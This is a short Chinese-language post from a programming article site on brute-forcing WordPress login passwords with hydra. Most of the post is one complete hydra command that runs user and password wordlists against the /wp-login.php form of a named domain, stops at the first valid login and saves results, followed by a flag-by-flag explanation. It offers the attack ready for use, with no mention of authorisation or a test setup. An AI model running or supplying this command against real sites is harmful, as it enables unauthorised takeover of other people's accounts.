欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

hydra爆破wordpress密码

程序员文章站 2022-06-27 16:42:44
wpscan带这个功能 但是用户只能单个,不方便..  hydra -L user.txt -P /Users/hacked/Desktop/133232.txt -o /user...
wpscan带这个功能 但是用户只能单个,不方便..

 hydra -L user.txt -P /Users/hacked/Desktop/133232.txt -o /users/hacked/123.txt -t 10 -f www.sysshell.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"

“/wp-login.php:log=^USER^&pwd=^PASS^:login_error”

说明:

-t 10 线程10条 默认是16

大写 L ,P 代表使用列表

小写 l ,p 代表指定.

/wp-login.php from提交表单的地址

log 用户字段 标示为 ^USER^表示这个是用户

pwd 密码字段

login_error 错误关键词, 登陆错误的关键词用于识别是否成功